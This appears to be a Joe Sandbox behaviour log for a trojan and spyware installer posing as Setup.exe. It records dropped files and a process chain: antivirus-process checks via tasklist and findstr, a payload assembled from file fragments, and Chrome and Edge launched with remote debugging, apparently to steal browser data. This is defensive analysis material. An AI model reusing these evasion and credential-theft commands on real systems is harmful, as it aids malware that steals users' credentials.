Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_006FB1B0 NtdllDefWindowProc_W,	0_2_006FB1B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_006FB810 NtdllDefWindowProc_W,	0_2_006FB810
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_006F7940 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,	0_2_006F7940
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00773AC0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,	0_2_00773AC0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_006F7DD3 NtdllDefWindowProc_W,	0_2_006F7DD3

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC5BF80: CreateFileW,DeviceIoControl,CloseHandle,

8_2_00007FF79EC5BF80

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC4D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,

8_2_00007FF79EC4D2C4

Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC5D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		8_2_00007FF79EC5D750
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Code function: 10_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		10_2_004038AF

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\559de8.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9F40.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9FAE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9FFD.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA03D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{BF99BD40-5B10-4B93-AA83-429E8C408451}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA0BB.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\559dea.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\559dea.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA1F4.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI9F40.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0086E090	0_2_0086E090
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_008882B0	0_2_008882B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0084C3B0	0_2_0084C3B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0085AC00	0_2_0085AC00
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00724C80	0_2_00724C80
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0085ED00	0_2_0085ED00
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_007115D0	0_2_007115D0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0091A01F	0_2_0091A01F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_008A6060	0_2_008A6060
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_006E7A00	0_2_006E7A00
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00728100	0_2_00728100
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_008B0480	0_2_008B0480
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00720430	0_2_00720430
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00892400	0_2_00892400
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0091A45E	0_2_0091A45E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00718560	0_2_00718560
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00714663	0_2_00714663
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_007787D0	0_2_007787D0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0072E9E0	0_2_0072E9E0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_008A6970	0_2_008A6970
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00736BC0	0_2_00736BC0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00716D40	0_2_00716D40
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_008A6DE0	0_2_008A6DE0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_008F2E50	0_2_008F2E50
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00820FB0	0_2_00820FB0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00848F20	0_2_00848F20
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0070CF90	0_2_0070CF90
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00702F80	0_2_00702F80
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00923290	0_2_00923290
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_006E33E0	0_2_006E33E0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_008FF330	0_2_008FF330
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0084F360	0_2_0084F360
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_006E1490	0_2_006E1490
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_008FB560	0_2_008FB560
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00721690	0_2_00721690
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00935999	0_2_00935999
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_008F9A60	0_2_008F9A60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_008A7BF0	0_2_008A7BF0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0092FC80	0_2_0092FC80
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0089DCF0	0_2_0089DCF0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00711E30	0_2_00711E30
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0092FFE0	0_2_0092FFE0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00729F00	0_2_00729F00
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005C0150	7_2_005C0150
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005B71A9	7_2_005B71A9
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005B8393	7_2_005B8393
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_0058D400	7_2_0058D400
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005AB570	7_2_005AB570
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005B168D	7_2_005B168D
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005B37DC	7_2_005B37DC
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005BF7A4	7_2_005BF7A4
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005C5A59	7_2_005C5A59
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005B1ACC	7_2_005B1ACC
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005B3B75	7_2_005B3B75
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005B5B10	7_2_005B5B10
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005A9CEC	7_2_005A9CEC
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005BFDF0	7_2_005BFDF0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC7F630	8_2_00007FF79EC7F630
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EBE5F3C	8_2_00007FF79EBE5F3C
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC7206C	8_2_00007FF79EC7206C
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC0BEB4	8_2_00007FF79EC0BEB4
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EBEBE70	8_2_00007FF79EBEBE70
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC8DB18	8_2_00007FF79EC8DB18
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EBF3C20	8_2_00007FF79EBF3C20
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EBEB9F0	8_2_00007FF79EBEB9F0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC8BA0C	8_2_00007FF79EC8BA0C
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC1793C	8_2_00007FF79EC1793C
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC61A18	8_2_00007FF79EC61A18
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EBFFA4F	8_2_00007FF79EBFFA4F
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC917C0	8_2_00007FF79EC917C0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC11750	8_2_00007FF79EC11750
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC0F8D0	8_2_00007FF79EC0F8D0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EBF58D0	8_2_00007FF79EBF58D0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC5D87C	8_2_00007FF79EC5D87C
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EBE183C	8_2_00007FF79EBE183C
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC21840	8_2_00007FF79EC21840
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC195B0	8_2_00007FF79EC195B0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC756A0	8_2_00007FF79EC756A0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EBEB390	8_2_00007FF79EBEB390
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC732AC	8_2_00007FF79EC732AC
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC2529C	8_2_00007FF79EC2529C
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC130DC	8_2_00007FF79EC130DC
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC26DE4	8_2_00007FF79EC26DE4
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC22D20	8_2_00007FF79EC22D20
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EBF0E70	8_2_00007FF79EBF0E70
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC8CE8C	8_2_00007FF79EC8CE8C
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC00E90	8_2_00007FF79EC00E90
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EBF2E30	8_2_00007FF79EBF2E30
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC76C34	8_2_00007FF79EC76C34
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC80AEC	8_2_00007FF79EC80AEC
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EBE2AE0	8_2_00007FF79EBE2AE0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC267F0	8_2_00007FF79EC267F0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC1A8A0	8_2_00007FF79EC1A8A0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC8A59C	8_2_00007FF79EC8A59C
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC8055C	8_2_00007FF79EC8055C
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC8C6D4	8_2_00007FF79EC8C6D4
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC0C3FC	8_2_00007FF79EC0C3FC
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC22400	8_2_00007FF79EC22400
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC683D4	8_2_00007FF79EC683D4
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC78360	8_2_00007FF79EC78360
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC76320	8_2_00007FF79EC76320
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC04514	8_2_00007FF79EC04514
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC184C0	8_2_00007FF79EC184C0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC0C130	8_2_00007FF79EC0C130
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC002C4	8_2_00007FF79EC002C4
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Code function: 10_2_0040737E	10_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Code function: 10_2_00406EFE	10_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Code function: 10_2_004079A2	10_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Code function: 10_2_004049A8	10_2_004049A8

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\402438\Suicide.com 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4

Source: C:\Users\Public\Desktop\Setup.exe	Code function: String function: 00007FF79EC08D58 appears 76 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 006F3440 appears 35 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00911904 appears 40 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 006EADE0 appears 67 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 006EA210 appears 32 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 006EA7A0 appears 59 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 006E8720 appears 54 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 006E9240 appears 123 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00837010 appears 32 times
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: String function: 005AA06F appears 72 times
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: String function: 005AA400 appears 40 times
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: String function: 005AA03C appears 103 times
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Code function: String function: 004062CF appears 58 times

Source: Setup.exe

Static PE information: invalid certificate

Source: Setup.exe, 00000000.00000003.2031159892.00000000083C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewininet.dllD vs Setup.exe
Source: Setup.exe	Binary or memory string: OriginalFilenameviewer.exeF vs Setup.exe
Source: Setup.exe	Binary or memory string: OriginalFilenamelzmaextractor.dllF vs Setup.exe
Source: Setup.exe	Binary or memory string: OriginalFilenameAICustAct.dllF vs Setup.exe
Source: Setup.exe	Binary or memory string: OriginalFilenamePrereq.dllF vs Setup.exe

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: shi732E.tmp.0.dr

Binary string: \Device\NameResTrk\RecordNrtCloneOpenPacket

Source: classification engine

Classification label: mal81.troj.spyw.evad.winEXE@55/80@8/6

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00848020 FormatMessageW,GetLastError,

0_2_00848020

Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC4D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		8_2_00007FF79EC4D5CC
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC4CCE0 AdjustTokenPrivileges,CloseHandle,		8_2_00007FF79EC4CCE0

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00724860 GetDriveTypeW,GetDiskFreeSpaceExW,

0_2_00724860

Source: C:\Windows\Installer\MSIA1F4.tmp

Code function: 7_2_005862B0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

7_2_005862B0

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00894D10 CoCreateInstance,

0_2_00894D10

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_006EA660 LoadResource,LockResource,SizeofResource,

0_2_006EA660

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\Lemcorporation

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

File created: C:\Users\user\AppData\Roaming\Lemcorporation

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03

Source: C:\Users\user\Desktop\Setup.exe

File created: C:\Users\user\AppData\Local\Temp\shi732E.tmp

Jump to behavior

Source: Setup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\Setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C2VKNO8Q1.20.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Setup.exe

String found in binary or memory: ComboBoxListBoxListViewINSERT INTO `` (`Property`, `Order`, `Value`, `Text`,`Binary_`) VALUES (?,?,?,?,?) TEMPORARY` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'EditSELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmpALLUSERS = 1ALLUSERS = 2MSIINSTALLPERUSER = 1AI_PACKAGE_TYPE = "x64"AI_PACKAGE_TYPE = "Intel64"SELECT * FROM `Control` WHERE `Dialog_` = '%s' AND `Control` = '%s'SELECT `Attributes` FROM `Control` WHERE `Dialog_` = '%s' AND `Control` = '%s'$=3SELECT `Attributes` FROM `Component` WHERE `Component` = '%s'WS_BORDERWS_CAPTIONWS_CHILDWS_CHILDWINDOWWS_CLIPCHILDRENWS_CLIPSIBLINGSWS_DISABLEDWS_DLGFRAMEWS_GROUPWS_HSCROLLWS_ICONICWS_SIZEBOXWS_SYSMENUWS_TABSTOPWS_THICKFRAMEWS_VISIBLEWS_VSCROLLWS_MAXIMIZEBOXWS_MAXIMIZEWS_MINIMIZEBOXWS_MINIMIZEWS_OVERLAPPEDWINDOWWS_OVERLAPPEDWS_POPUPWINDOWWS_POPUPWS_TILEDWINDOWWS_TILEDWS_EX_ACCEPTFILESWS_EX_APPWINDOWWS_EX_CLIENTEDGEWS_EX_CONTEXTHELPWS_EX_CONTROLPARENTWS_EX_DLGMODALFRAMEWS_EX_LEFTWS_EX_LEFTSCROLLBARWS_EX_LTRREADINGWS_EX_MDICHILDWS_EX_NOPARENTNOTIFYWS_EX_OVERLAPPEDWINDOWWS_EX_PALETTEWINDOWWS_EX_RTLREADINGWS_EX_STATICEDGEWS_EX_TOOLWINDOWWS_EX_TOPMOSTWS_EX_TRANSPARENTWS_EX_WINDOWEDGEWS_EX_RIGHTSCROLLBARWS_EX_RIGHTWS_EX_LAYEREDWS_EX_NOACTIVATEWS_EX_NOINHERITLAYOUTWS_EX_LAYOUTRTLWS_EX_COMPOSITEDWS_EXAI_TRIAL_MESSAGE_BODYAI_MSM_TRIAL_MESSAGE_BODYAI_APP_FILEAI_README_FILEAI_APP_ARGSAI_RUN_AS_ADMINMsiLogFileLocation[ProgramFilesFolder][LocalAppDataFolder]Programs\[ProgramFiles64Folder][CommonFilesFolder][LocalAppDataFolder]Programs\Common\[CommonFiles64Folder][WindowsFolder][LocalAppDataFolder][SystemFolder][WindowsVolume][ProgramMenuFolder][DesktopFolder][StartupFolder][TemplateFolder][AdminToolsFolder][AI_UserProgramFiles][WindowsVolume]Program Files (x86)\[AI_ProgramFiles][WindowsVolume]Program Files\MIGRATEFindRelatedProductsMigrateFeatureStatesAI_SETMIXINSTLOCATIONAI_RESTORE_LOCATIONSELECT `ActionProperty` FROM `Upgrade``Action`='SET_APPDIR' OR `Action`='SET_SHORTCUTDIR'SET_APPDIRSET_SHORTCUTDIRSHORTCUTDIRProgramMenuFolderAI_SH_INITEDBrowseDlgCancelDlgDiskCostDlgExitDialogMsiRMFilesInUseOutOfDiskDlgOutOfRbDiskDlgDialog_Control_(`Control_` = 'Next' OR `Control_` = 'Install') AND `Event` = 'EndDialog' AND `Argument` = 'Return'ControlEventAI_INSTALLPERUSER = "0"ALLUSERSVersionMsi >= "5.0"2MSIINSTALLPERUSERAI_NEWINSTProductLanguageAI_INTANCE_LOCATIONAI_UPGRADEValueNoLanguageVersionStringInstallLocationAI_REPLACE_PRODUCTSAI_Replaced_Versions_ListAI_Upgrade_Replace_Question_YesBackUp_AI_Upgrade_Question_YesAI_Upgrade_Question_YesAI_Upgrade_Replace_Question_NoBackUp_AI_Upgrade_Question_NoAI_Upgrade_Question_NoYesDELETE FROM `Shortcut` WHERE `Shortcut`.`Directory_`='%s'DELETE FROM `IniFile` WHERE `IniFile`.`Section`='InternetShortcut' AND`IniFile`.`DirProperty`='%s'SELECT * FROM `%s`ShortcutIniFileAI_DESKTOP_SHAI_STARTMENU_SHAI_STARTUP_SHAI_SHORTC

Source: C:\Users\user\Desktop\Setup.exe

File read: C:\Users\user\Desktop\Setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 82260A52980C2844E9E250AB0420C526 C
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Lemcorporation\Setup 0.5.1.2\install\Setup.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Setup.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733431593 "
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 940B1FE1CFD6E428C01CBEAC4D3DBCDC C
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F4149E57099CE1AEFABD5D1B5FEFF577
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIA1F4.tmp "C:\Windows\Installer\MSIA1F4.tmp" /DontWait "C:\Users\Public\Desktop\Setup.exe"
Source: unknown	Process created: C:\Users\Public\Desktop\Setup.exe "C:\Users\Public\Desktop\Setup.exe"
Source: C:\Users\Public\Desktop\Setup.exe	Process created: C:\Users\user\AppData\Local\Temp\lem.exe C:\Users\user\AppData\Local\Temp\lem.exe
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 402438
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "integratedintlhandlingwaterproofcbperformtreasurertim" Recording
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Coaches + ..\Hypothetical + ..\Nasty + ..\Fly + ..\Zum + ..\Disclose + ..\Expensive + ..\Argue N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\402438\Suicide.com Suicide.com N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2296,i,7454184936104441568,15568927826006656049,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Lemcorporation\Setup 0.5.1.2\install\Setup.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Setup.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733431593 "	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 82260A52980C2844E9E250AB0420C526 C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 940B1FE1CFD6E428C01CBEAC4D3DBCDC C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F4149E57099CE1AEFABD5D1B5FEFF577	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIA1F4.tmp "C:\Windows\Installer\MSIA1F4.tmp" /DontWait "C:\Users\Public\Desktop\Setup.exe"	Jump to behavior
